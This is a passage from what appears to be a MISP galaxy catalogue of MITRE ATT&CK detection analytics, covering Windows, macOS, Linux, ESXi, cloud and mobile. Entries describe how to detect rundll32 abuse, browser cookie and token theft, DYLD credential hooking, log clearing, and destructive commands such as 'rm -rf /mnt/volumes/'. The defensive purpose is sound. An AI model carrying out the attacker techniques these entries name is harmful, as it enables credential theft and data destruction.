UUID 75c4eac4-c61c-4d02-acd9-ec8f5b6cfaff which can be used as unique global reference for Analytic 1730 - AN1730 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1730
mitre_platforms ['Android']

Analytic 1308 - AN1308

Detects rundll32.exe invoked with atypical arguments (.dll, .cpl, javascript:, mshtml). DLLs not normally loaded by rundll32 are mapped into memory. Control_RunDLL or RunHTMLApplication invoked. Suspicious DLLs or scripts accessed from disk or network. Rundll32 reaches out to external domains (e.g., fetching .sct or .hta).

Internal MISP references

UUID 2cb33f68-48f8-4ffe-86e1-bc857a300398 which can be used as unique global reference for Analytic 1308 - AN1308 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1308
mitre_platforms ['Windows']

Analytic 0381 - AN0381

Detects email-sending behavior via Terminal, AppleScript, or Automator that interfaces with SMTP or IMAP, typically using curl or mail-related APIs in unsanctioned contexts.

Internal MISP references

UUID 43347e24-50d6-446e-923d-a6fd69805a22 which can be used as unique global reference for Analytic 0381 - AN0381 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0381
mitre_platforms ['macOS']

Analytic 1083 - AN1083

Detects BusyBox or Ash shell execution from unauthorized logins or remote connections. Focus is on rare shell invocations from DCUI, SSH sessions, or remote management paths. Also watches for payload droppers or persistence artifacts using shell.

Internal MISP references

UUID 52f4a572-0d43-4684-9598-6bc8cf2bffb1 which can be used as unique global reference for Analytic 1083 - AN1083 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1083
mitre_platforms ['ESXi']

Analytic 0813 - AN0813

Execution of renamed or dropped files with a trailing space to deceive users or analysts, especially in LaunchAgents or LaunchDaemons.

Internal MISP references

UUID 773188c7-6191-4ba4-ad39-b67ed8578dd9 which can be used as unique global reference for Analytic 0813 - AN0813 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0813
mitre_platforms ['macOS']

Analytic 0138 - AN0138

Malicious Office add-ins loaded via VSTO, COM, or VBA auto-load paths. Upon launch of Word/Excel/Outlook, the add-in executes code without user action. Add-in resides in trusted directory or registered via Office COM/VBE subsystem. Behavior includes unsigned add-in execution, anomalous load context, or add-in spawning interpreter process.

Internal MISP references

UUID 9ad4670e-f336-454f-960e-4f2f611f3657 which can be used as unique global reference for Analytic 0138 - AN0138 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0138
mitre_platforms ['Office Suite']

Analytic 0318 - AN0318

Detects enumeration of local groups using common binaries (groups, getent, cat /etc/group) or scripting with suspicious lineage.

Internal MISP references

UUID a62a2b36-00e9-481c-9a3a-14c14cd42dae which can be used as unique global reference for Analytic 0318 - AN0318 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0318
mitre_platforms ['Linux']

Analytic 1380 - AN1380

Privileged or rarely used accounts performing bulk access to SharePoint files or metadata over a short time window, indicating potential scripted collection of sensitive internal documents.

Internal MISP references

UUID afb1860a-e29a-4ce8-9524-ab371c5f8d4f which can be used as unique global reference for Analytic 1380 - AN1380 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1380
mitre_platforms ['Windows']

Analytic 0183 - AN0183

Use of nohup, disown, or AppleScript constructs to suppress process interrupts. Defender perspective: commands containing nohup or hidden background tasks (osascript with persistent execution) correlated with processes surviving user logouts.

Internal MISP references

UUID c9079261-caa7-4cfe-8be6-1359db599d27 which can be used as unique global reference for Analytic 0183 - AN0183 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0183
mitre_platforms ['macOS']

Analytic 1038 - AN1038

Correlate file modifications in shell startup scripts (e.g., .bashrc, .profile) with embedded trap commands and observe if those changes are followed by the unexpected execution of child processes when terminal signals (e.g., SIGINT) are triggered. Use contextual linking with user session activity to detect privilege misuse.

Internal MISP references

UUID d1d19568-2b59-4d44-9744-22d7304d2200 which can be used as unique global reference for Analytic 1038 - AN1038 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1038
mitre_platforms ['Linux']

Analytic 0831 - AN0831

Detects adversarial archiving using built-in or third-party utilities (makecab, diantz, xcopy, certutil, 7z, WinRAR, WinZip). Correlates suspicious process creation events with command-line arguments for compression/encoding, followed by creation of archive files (.cab, .zip, .7z, .rar). Identifies anomalous loading of crypt32.dll for encryption operations or execution of diantz.exe to compress remotely staged files.

Internal MISP references

UUID ebfa3aa8-dc7c-4d56-868e-169c873b5e78 which can be used as unique global reference for Analytic 0831 - AN0831 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0831
mitre_platforms ['Windows']

Analytic 1803 - AN1803

Mobile security products can often alert the user if their device is vulnerable to known exploits.

Internal MISP references

UUID a8133527-5402-49e0-a9f1-14ee4fb2dd3f which can be used as unique global reference for Analytic 1803 - AN1803 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1803
mitre_platforms ['iOS']

Analytic 1830 - AN1830

Scheduling tasks/jobs can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.

Internal MISP references

UUID f10a7842-ddb2-488b-93ac-e53fa6476614 which can be used as unique global reference for Analytic 1830 - AN1830 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1830
mitre_platforms ['iOS']

Analytic 1093 - AN1093

Detects anomalous ARP cache changes and unsolicited ARP broadcasts using unified logs and packet capture. Behavioral detection includes multiple IP addresses mapped to the same MAC address and repeated gratuitous ARP traffic.

Internal MISP references

UUID 0f996058-7524-4759-9d88-a8997e90ff3c which can be used as unique global reference for Analytic 1093 - AN1093 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1093
mitre_platforms ['macOS']

Analytic 0913 - AN0913

Detects the presence of executables with high NOP padding, unusually large binary size for their function, and follow-on execution or memory injection from such files, especially when originating from temp or user-space paths.

Internal MISP references

UUID 2ae1dd34-c666-488f-8ad6-752b8a6acae1 which can be used as unique global reference for Analytic 0913 - AN0913 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0913
mitre_platforms ['Windows']

Analytic 0193 - AN0193

Phishing delivered via SaaS services (chat, collaboration platforms) where messages contain malicious URLs or attachments. Detect anomalous link clicks, suspicious file uploads, or token misuse after SaaS-based phishing attempts.

Internal MISP references

UUID 4da63d13-d9bb-41c6-88c8-31bc9f2579fb which can be used as unique global reference for Analytic 0193 - AN0193 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0193
mitre_platforms ['SaaS']

Analytic 1309 - AN1309

Correlates creation of email forwarding rules or header anomalies (e.g., X-MS-Exchange-Organization-AutoForwarded) with suspicious process execution, file access of .pst/.ost files, and network connections to external SMTP servers.

Internal MISP references

UUID 4f15b707-9b44-4716-bfcd-e3f28659077b which can be used as unique global reference for Analytic 1309 - AN1309 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1309
mitre_platforms ['Windows']

Analytic 0139 - AN0139

Creation or modification of files in directories known to be excluded from AV scanning (e.g., C:\Windows\Temp, Exchange server directories, or default AV exclusions). Defender perspective: correlate file creation with execution behavior or anomalous parent processes writing to excluded paths.

Internal MISP references

UUID 620cae28-1874-462d-a2e4-47ddd75098ea which can be used as unique global reference for Analytic 0139 - AN0139 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0139
mitre_platforms ['Windows']

Analytic 0931 - AN0931

Remote Desktop (RDP) logon by a user followed by unusual process execution, file access, or lateral movement activity within a short timeframe.

Internal MISP references

UUID 63fcb4be-f5c2-47da-951d-cd1b4f1a2cc0 which can be used as unique global reference for Analytic 0931 - AN0931 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0931
mitre_platforms ['Windows']

Analytic 0319 - AN0319

Detects use of dscl or id/group commands to enumerate local system groups, often by post-exploitation tools or persistence checks.

Internal MISP references

UUID 66923fbc-1d4d-4945-89dd-102a8e2c6122 which can be used as unique global reference for Analytic 0319 - AN0319 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0319
mitre_platforms ['macOS']

Analytic 1039 - AN1039

Detect unauthorized trap command registrations in shell startup files (e.g., .zprofile, .bash_profile, .zshrc) followed by execution chains during user terminal interaction. Use Unified Logs and EDR telemetry to correlate shell command parsing and process tree anomalies.

Internal MISP references

UUID 99c42b1f-1716-413b-8c23-5f7e1d997ab2 which can be used as unique global reference for Analytic 1039 - AN1039 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1039
mitre_platforms ['macOS']

Analytic 0391 - AN0391

Detects DYLD_INSERT_LIBRARIES abuse to hook credential-sensitive applications by correlating process spawns with unauthorized library injection and monitoring changes to the __TEXT segment (code) of credential handling binaries.

Internal MISP references

UUID b8141218-1f71-4b65-a611-7c9c55038c4c which can be used as unique global reference for Analytic 0391 - AN0391 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0391
mitre_platforms ['macOS']

Analytic 1390 - AN1390

Detects command-line utilities or scripts using encryption libraries or symmetric algorithms (e.g., OpenSSL AES, GPG, Python + PyCrypto) in conjunction with outbound file transfers or traffic to external destinations.

Internal MISP references

UUID d8978977-d2c8-4c1c-a6c1-0176330e3446 which can be used as unique global reference for Analytic 1390 - AN1390 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1390
mitre_platforms ['Linux']

Analytic 1404 - AN1404

Detects unauthorized access to browser cookie paths (e.g., ~/Library/Application Support/Google/Chrome/Default/Cookies) or task_for_pid/vm_read calls to Safari/Chrome memory space.

Internal MISP references

UUID 3fdd7ef4-b382-4880-9f72-bf0ad696af85 which can be used as unique global reference for Analytic 1404 - AN1404 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1404
mitre_platforms ['macOS']

Analytic 0144 - AN0144

Detects excessive outbound traffic to a remote host over HTTP(S) from uncommon or previously unseen processes.

Internal MISP references

UUID 79c7d394-e772-479c-acf9-ddd05b8a68b9 which can be used as unique global reference for Analytic 0144 - AN0144 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0144
mitre_platforms ['Windows']

Analytic 0441 - AN0441

Unusual screensaver (.scr) executions correlated with recent registry modifications to HKCU\Control Panel\Desktop values such as SCRNSAVE.exe, ScreenSaveTimeout, and ScreenSaveActive. Detection focuses on PE image paths not consistent with known legitimate screensavers and triggered after user inactivity timeout.

Internal MISP references

UUID 86dbac4c-1cba-4056-84a1-604eefbb11ac which can be used as unique global reference for Analytic 0441 - AN0441 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0441
mitre_platforms ['Windows']

Analytic 1044 - AN1044

Execution of file discovery commands (e.g., 'dir', 'show flash', 'nvram:') from CLI interfaces, especially by unauthorized users or from abnormal source IPs.

Internal MISP references

UUID be6e5f23-0e29-430f-83f7-d76c58de3a2d which can be used as unique global reference for Analytic 1044 - AN1044 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1044
mitre_platforms ['Network Devices']

Analytic 0414 - AN0414

Adversary deletes critical infrastructure: EC2 instances, S3 buckets, snapshots, or volumes using elevated IAM credentials. Frequently includes batch API calls with Delete* or TerminateInstances.

Internal MISP references

UUID c6f35e44-459c-456b-97a7-997eb2baefb9 which can be used as unique global reference for Analytic 0414 - AN0414 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0414
mitre_platforms ['IaaS']

Analytic 1440 - AN1440

Detects suspicious use of PowerShell, .NET, or script interpreters to spawn processes that mimic UAC prompts, often with credential capture dialogue boxes invoked from non-standard parent processes.

Internal MISP references

UUID ea127140-2f66-4c3d-93ab-215c210ad6c5 which can be used as unique global reference for Analytic 1440 - AN1440 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1440
mitre_platforms ['Windows']

Analytic 0145 - AN0145

Identifies custom or previously unseen userland processes initiating high-volume HTTP connections with low response volume.

Internal MISP references

UUID 07deb060-c373-4059-b73b-736688a25c80 which can be used as unique global reference for Analytic 0145 - AN0145 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0145
mitre_platforms ['Linux']

Analytic 0451 - AN0451

Detect repeated failed login events followed by MFA challenges triggered in rapid succession, especially if originating from service accounts or anomalous IP addresses.

Internal MISP references

UUID 2c0df764-d9bd-4a91-808a-aa13df13511a which can be used as unique global reference for Analytic 0451 - AN0451 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0451
mitre_platforms ['Windows']

Analytic 0514 - AN0514

CLI tools (smbclient -L, smbmap, rpcclient, nmblookup) or custom scripts enumerate SMB shares on many internal hosts → corresponding SMB connections (445/139) captured by Zeek/Netflow within a short window.

Internal MISP references

UUID 2de35397-ef03-4ffe-b531-d7ad61a6f41d which can be used as unique global reference for Analytic 0514 - AN0514 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0514
mitre_platforms ['Linux']

Analytic 1450 - AN1450

Remote knock sequence followed by PF/socketfilterfw rule update or a background process listening on a new port; then a successful TCP session. Also flags WoL magic packets on local segment.

Internal MISP references

UUID 48d2effa-7fc0-4790-9cc9-bbe573c29301 which can be used as unique global reference for Analytic 1450 - AN1450 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1450
mitre_platforms ['macOS']

Analytic 0541 - AN0541

Detection of anti-malware quarantining or flagging a tool, followed by a new binary written to disk with a similar function or name and a resumed process chain.

Internal MISP references

UUID 66bab948-9baa-4f5c-b259-333eb2ac08ad which can be used as unique global reference for Analytic 0541 - AN0541 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0541
mitre_platforms ['Linux']

Analytic 1540 - AN1540

Identify use of 'shutdown', 'reboot', or 'osascript' system shutdown invocations within unified logs and track unexpected shutdown sequences initiated by GUI or script. Cross-reference with user activity or absence thereof.

Internal MISP references

UUID 6b11c208-4dbf-4d52-9254-524e622c6250 which can be used as unique global reference for Analytic 1540 - AN1540 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1540
mitre_platforms ['macOS']

Analytic 0154 - AN0154

Detection of unexpected additions or modifications to system-wide certificate stores or execution of commands adding certificates to trusted stores.

Internal MISP references

UUID 759c073c-2c40-484b-af47-8426ec5d5a3e which can be used as unique global reference for Analytic 0154 - AN0154 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0154
mitre_platforms ['Linux']

Analytic 1405 - AN1405

Detects automation macros or VBA scripts in documents that access browser file paths, read cookie data, or attempt to exfiltrate browser session tokens over HTTP.

Internal MISP references

UUID 916993bd-600a-43e2-abbf-30c56be84459 which can be used as unique global reference for Analytic 1405 - AN1405 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1405
mitre_platforms ['Office Suite']

Analytic 0415 - AN0415

Adversary destroys virtual disks (VMDK), images, or VMs by invoking vim-cmd, deleting datastore contents, or purging snapshots.

Internal MISP references

UUID 9ea1e329-691a-43a7-b56d-affbc00fb9e7 which can be used as unique global reference for Analytic 0415 - AN0415 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0415
mitre_platforms ['ESXi']

Analytic 1045 - AN1045

Monitor for suspicious use of Windows API calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or processes manually checking the BeingDebugged flag in the Process Environment Block (PEB). Detect sequences of OutputDebugStringW() calls in short intervals that may indicate debugger flooding attempts.

Internal MISP references

UUID d5f0b652-3699-45af-97e6-81e7426558bd which can be used as unique global reference for Analytic 1045 - AN1045 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1045
mitre_platforms ['Windows']

Analytic 1054 - AN1054

Monitor for creation of new Power Automate flows or equivalent automation scripts that trigger on user or file events. Detect anomalous actions performed by these automations, such as email forwarding, anonymous link creation, or unexpected API calls to external endpoints.

Internal MISP references

UUID f8787a86-552b-4e03-8d68-7177001a215d which can be used as unique global reference for Analytic 1054 - AN1054 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1054
mitre_platforms ['Office Suite']

Analytic 1504 - AN1504

Detects cloud account use for API calls that exceed normal scope, such as IAM changes or access to services never used before.

Internal MISP references

UUID fc507123-4267-4cf8-9e30-a90a89043b20 which can be used as unique global reference for Analytic 1504 - AN1504 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1504
mitre_platforms ['IaaS']

Analytic 1460 - AN1460

Detects use of macOS-native archiving or encryption tools (zip, ditto, hdiutil) for staging collected data. Identifies unexpected invocation of archive utilities by Office apps, browsers, or background daemons. Correlates file creation of .zip/.dmg containers with process lineage anomalies.

Internal MISP references

UUID 0f4789c9-7946-473f-967b-e8ca59fa3c8c which can be used as unique global reference for Analytic 1460 - AN1460 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1460
mitre_platforms ['macOS']

Analytic 0164 - AN0164

Detect manipulation of system or application files in /Library, /System, or user data directories using FSEvents and Unified Logs. Identify anomalous process execution modifying plist files, structured data, or logs outside expected update cycles.

Internal MISP references

UUID 13f8d339-8239-4d84-adf2-1abf1a0f3d5d which can be used as unique global reference for Analytic 0164 - AN0164 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0164
mitre_platforms ['macOS']

Analytic 1640 - AN1640

SSH login via hostd or /var/log/auth.log, followed by CLI access to host shell or file manipulation in restricted areas.

Internal MISP references

UUID 1b6eaec8-141f-44f8-ae1f-387c44635c38 which can be used as unique global reference for Analytic 1640 - AN1640 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1640
mitre_platforms ['ESXi']

Analytic 1064 - AN1064

Correlates script execution or suspicious parent processes with creation or modification of encoded, compressed, or encrypted file formats (e.g., .zip, .7z, .enc) and abnormal command-line syntax or PowerShell obfuscation.

Internal MISP references

UUID 1dee558e-720e-4f3b-9414-192a63eb8909 which can be used as unique global reference for Analytic 1064 - AN1064 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1064
mitre_platforms ['Windows']

Analytic 1604 - AN1604

Adversary uses built-in OS tools or API calls to create local or domain accounts for persistence or lateral movement. Tools such as 'net user', PowerShell, or MMC snap-ins may be used. Detection focuses on Event ID 4720 paired with process lineage and user context.

Internal MISP references

UUID 33d574c3-8e9b-462d-b3d1-09e64c2fa8c7 which can be used as unique global reference for Analytic 1604 - AN1604 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1604
mitre_platforms ['Windows']

Analytic 1406 - AN1406

Detects use of session cookies or authentication tokens from unusual user agents or locations. Identifies token reuse without reauthentication or attempts to bypass MFA using previously stolen cookies.

Internal MISP references

UUID 5e1d71ce-5653-4580-a609-9832c88e2c87 which can be used as unique global reference for Analytic 1406 - AN1406 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1406
mitre_platforms ['SaaS']

Analytic 0416 - AN0416

Container process executes destructive file operations inside volume mounts or host paths. Includes rm -rf /mnt/volumes/, container breakout followed by host deletion attempts.

Internal MISP references

UUID 7735a0b1-f3bc-44fc-a909-75738e77bded which can be used as unique global reference for Analytic 0416 - AN0416 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0416
mitre_platforms ['Containers']

Analytic 0614 - AN0614

Detection of Windows container escape attempts by observing processes accessing host directories, symbolic link abuse, or privilege escalation attempts. Defenders may detect anomalous process execution with access to system-level directories outside of container boundaries.

Internal MISP references

UUID 81e2b983-2159-47d1-9ec1-a5c863faa1a7 which can be used as unique global reference for Analytic 0614 - AN0614 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0614
mitre_platforms ['Windows']

Analytic 0641 - AN0641

Enumeration of global address lists or email account metadata via PowerShell cmdlets (e.g., Get-GlobalAddressList) or MAPI/RPC from non-admin, non-mailserver systems.

Internal MISP references

UUID cd91348f-296f-4007-a853-6d06d8175210 which can be used as unique global reference for Analytic 0641 - AN0641 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0641
mitre_platforms ['Windows']

Analytic 0461 - AN0461

Chain: (1) privileged CLI sessions run read-only commands that dump AAA/password policies (e.g., show aaa, show password-policy); (2) same account changes AAA or user DB shortly after. Use network device AAA/command accounting or syslog.

Internal MISP references

UUID d93312e3-210a-4757-b638-4ed19fca8621 which can be used as unique global reference for Analytic 0461 - AN0461 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0461
mitre_platforms ['Network Devices']

Analytic 0146 - AN0146

Flags unexpected user applications initiating long-lived HTTP(S) sessions with irregular traffic patterns.

Internal MISP references

UUID dc87f086-1764-43c2-a7bf-1a5ba2ea8191 which can be used as unique global reference for Analytic 0146 - AN0146 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0146
mitre_platforms ['macOS']

Analytic 1046 - AN1046

Monitor access to /proc/self/status where TracerPID field is queried, as this is a common technique for debugger detection. Detect processes that attempt to trigger exceptions intentionally and monitor whether exception handling indicates presence of a debugger.

Internal MISP references

UUID e4a9dd91-3354-40c8-a55c-941d53f2ddec which can be used as unique global reference for Analytic 1046 - AN1046 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1046
mitre_platforms ['Linux']

Analytic 0417 - AN0417

Adversary gains access to cloud-hosted services such as AWS SES, SNS, or OpenAI API, enables or modifies usage policies, and initiates resource-intensive actions (e.g., mass email/SMS or LLM queries), often from unauthorized regions or under anomalous identity conditions.

Internal MISP references

UUID 01967eb2-5169-4113-aff0-ac2180fd14d9 which can be used as unique global reference for Analytic 0417 - AN0417 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0417
mitre_platforms ['SaaS']

Analytic 1074 - AN1074

Adversaries accessing datastore or configuration files via vim-cmd, esxcli, or SCP to extract logs, VMs, or host configurations.

Internal MISP references

UUID 0abb4122-0795-46ef-b162-7570db42596a which can be used as unique global reference for Analytic 1074 - AN1074 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1074
mitre_platforms ['ESXi']

Analytic 0147 - AN0147

Sequence of internal email sent from a recently compromised user account (preceded by abnormal logon or device activity), with attachments or links leading to execution or credential harvesting. Defender observes: internal mail delivery to peers with high entropy attachments, followed by click events, process initiation, or credential prompts.

Internal MISP references

UUID 0bf5b548-50d0-4e73-bb3c-413cbdfafd97 which can be used as unique global reference for Analytic 0147 - AN0147 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0147
mitre_platforms ['Windows']

Analytic 1407 - AN1407

Detects suspicious SVG file creation or download events followed by script engine execution (e.g., wscript.exe, mshta.exe, rundll32.exe), network callbacks, or browser-based credential collection.

Internal MISP references

UUID 288a28ac-e1e4-4e7e-9156-d3b975ed45ed which can be used as unique global reference for Analytic 1407 - AN1407 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1407
mitre_platforms ['Windows']

Analytic 0174 - AN0174

Detects Python execution from non-standard user contexts or cron jobs that invoke outbound traffic, access sensitive files, or perform process injection (e.g., ptrace or /proc memory maps).

Internal MISP references

UUID 59354e08-ed82-4b95-99c5-aed3996473e1 which can be used as unique global reference for Analytic 0174 - AN0174 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0174
mitre_platforms ['Linux']

Analytic 0471 - AN0471

Detects use of clear history or clear logging commands on network device CLI to remove past activity logs.

Internal MISP references

UUID 7879313f-abf1-487a-b4d3-813f385ddce3 which can be used as unique global reference for Analytic 0471 - AN0471 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0471
mitre_platforms ['Network Devices']

Analytic 0741 - AN0741

Persistent high CPU utilization combined with suspicious command-line execution (e.g., mining tools or obfuscated scripts) and outbound connections to mining/proxy networks.

Internal MISP references

UUID a789e535-cab9-49b4-9685-c10a5d3642b4 which can be used as unique global reference for Analytic 0741 - AN0741 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0741
mitre_platforms ['Windows']

Analytic 1470 - AN1470

Cloud API usage to create/import SSH keys or generate new access keys (CreateAccessKey, ImportKeyPair, CreateLoginProfile) from non-console access or unusual principals.

Internal MISP references

UUID b31afcb5-1690-43f1-acbb-3e2936e48616 which can be used as unique global reference for Analytic 1470 - AN1470 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1470
mitre_platforms ['IaaS']

Analytic 1047 - AN1047

Detect suspicious calls to sysctl or ptrace API used to determine if a process is being debugged. Monitor for processes that flood OutputDebugString equivalents or generate abnormal exceptions to evade analysis.

Internal MISP references

UUID c78d2e09-07d7-48ef-add1-bde622e502a2 which can be used as unique global reference for Analytic 1047 - AN1047 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1047
mitre_platforms ['macOS']

Analytic 0714 - AN0714

Adversary installation or use of RMM software (e.g., TeamViewer, AnyDesk, ScreenConnect) followed by outbound beaconing or remote session establishment.

Internal MISP references

UUID fe1e10ae-ddd2-40f0-8e62-3db88c0c8c68 which can be used as unique global reference for Analytic 0714 - AN0714 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0714
mitre_platforms ['Windows']

Analytic 1740 - AN1740

On Android, Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android's SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromised devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices.

Internal MISP references

UUID 007a370c-be77-49c9-9ca3-25d50de35864 which can be used as unique global reference for Analytic 1740 - AN1740 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1740
mitre_platforms ['iOS']

Analytic 1704 - AN1704

Application vetting services could look for misuse of dynamic libraries.

Internal MISP references

UUID 166d394c-6d24-46d3-866e-4f57ca849e90 which can be used as unique global reference for Analytic 1704 - AN1704 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1704
mitre_platforms ['iOS']

Analytic 0184 - AN0184

Adversary installs or modifies IIS components (ISAPI filters, extensions, or modules) using DLL files registered via configuration changes or administrative tools like AppCmd.exe. These components intercept or manipulate HTTP requests/responses for persistence or C2.

Internal MISP references

UUID 09ef4725-8e20-452d-b08c-f7db3cbee174 which can be used as unique global reference for Analytic 0184 - AN0184 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0184
mitre_platforms ['Windows']

Analytic 0841 - AN0841

Execution of files originating from removable media after drive mount, with correlation to file write activity, autorun usage, or lateral spread via staged tools.

Internal MISP references

UUID 12c748a0-3ce9-4fd2-8a65-f4362b69cafd which can be used as unique global reference for Analytic 0841 - AN0841 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0841
mitre_platforms ['Windows']

Analytic 1048 - AN1048

Correlated use of sleep/delay mechanisms (e.g., kernel32!Sleep, NTDLL APIs) in short-lived processes, combined with parent processes invoking suspicious scripts (e.g., wscript, powershell) with minimal user interaction.

Internal MISP references

UUID 28e26a6a-e470-4f1c-845f-f2cbd816a1f7 which can be used as unique global reference for Analytic 1048 - AN1048 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1048
mitre_platforms ['Windows']

Analytic 1084 - AN1084

Detects Unix shell usage on network appliances (e.g., routers, firewalls, embedded Linux) through rare console commands, CLI interfaces, or script injection via exposed APIs or SSH.

Internal MISP references

UUID 2adf0c92-5d0a-459d-affc-f4abd4d406d0 which can be used as unique global reference for Analytic 1084 - AN1084 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1084
mitre_platforms ['Network Devices']

Analytic 0814 - AN0814

Detects injection or tampering of DLLs in hybrid identity agents (e.g., AzureADConnectAuthenticationAgentService), registry or configuration changes tied to PTA/AD FS, and anomalous LSASS or AD FS module loads correlated with authentication anomalies.

Internal MISP references

UUID 344f0add-d372-4e0e-88c6-f48e6b424434 which can be used as unique global reference for Analytic 0814 - AN0814 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0814
mitre_platforms ['Windows']

Analytic 0418 - AN0418

Forged SAML tokens can be observed as authentication attempts with valid signatures but missing expected preceding Kerberos or authentication events. Defenders may correlate SAML assertions with absent Event IDs 4769, 1200, or 1202, or tokens issued with abnormal lifetimes, issuers, or claims compared to baseline.

Internal MISP references

UUID 3cb835e5-ded1-42c4-a5cc-38911078b0a5 which can be used as unique global reference for Analytic 0418 - AN0418 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0418
mitre_platforms ['Identity Provider']

Analytic 1408 - AN1408

Detects downloaded SVG files followed by execution of browser processes or tools like xdg-open, and rapid follow-on network connections or process spawns to interpreters like python or bash.

Internal MISP references

UUID 99bfd95b-256a-4b1d-bf1d-481f47642c15 which can be used as unique global reference for Analytic 1408 - AN1408 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1408
mitre_platforms ['Linux']

Analytic 1480 - AN1480

